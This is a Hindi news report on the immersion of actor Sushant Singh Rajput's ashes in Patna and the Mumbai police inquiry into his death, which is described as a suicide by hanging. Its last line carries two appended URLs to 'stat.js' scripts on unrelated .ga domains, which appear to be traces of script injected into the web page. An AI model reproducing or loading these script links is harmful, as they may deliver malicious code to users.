फिल्म अभिनेता सुशांत सिंह राजपूत की अंत्येष्टि के बाद गुरुवार को पटना के दीघा गंगा घाट पर उनकी अस्थियां विसर्जित की गईं। इसी घाट पर सुशांत की मां की भी अस्थियां विसर्जित की गईं थीं। इसके पहले बुधवार को उनके पिता केके सिंह पटना वापस लौटे थे। सुशांत का श्राद्धकर्म राजीवनगर स्थित आवास पर ही होगा।
स्वजनों के अनुसार, पूर्णिया स्थित पैतृक गांव के लोगों व नाते-रिश्तेदारों के आने के बाद श्राद्धकर्म संपन्न होगा। सुशांत सिंह राजपूत 14 जून को यहां बांद्रा स्थित अपने अपार्टमेंट में फां’सी के फं’दे से लटके मिले थे। मौके पर कोई सु’साइड नोट नहीं मिला है। सुशांत के पिता कृष्ण कुमार सिंह और दो बहनों समेत नौ लोगों के बयान दर्ज किए हैं। मुंबई में अभिनेता के अंतिम संस्कार के बाद मंगलवार को परिजनों के दिल्ली रवाना होने से पहले बयान दर्ज किए गए। बॉलीवुड अभिनेता सुशांत सिंह राजपूत के पिता ने पुलिस से कहा कि उन्हें और उनके परिवार के अन्य सदस्यों को सुशांत के अव’साद के कारणों के बारे में नहीं पता है।
जिन लोगों बयान दर्ज किए गए हैं उनमें सुशांत के रसोइया, एक कर्मचारी और प्रबंधक शामिल है। पुलिस इस बात की भी पड़ताल कर रही है कि सुशांत किसी पेशेवर खेमेबाजी की वजह से तो अवसाद में नहीं थे। जांचकर्ताओं को अभी तक कोई सुराग नहीं मिला है कि सुशांत सिंह राजपूत ने यह कदम किन परिस्थितियों में उठाया।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms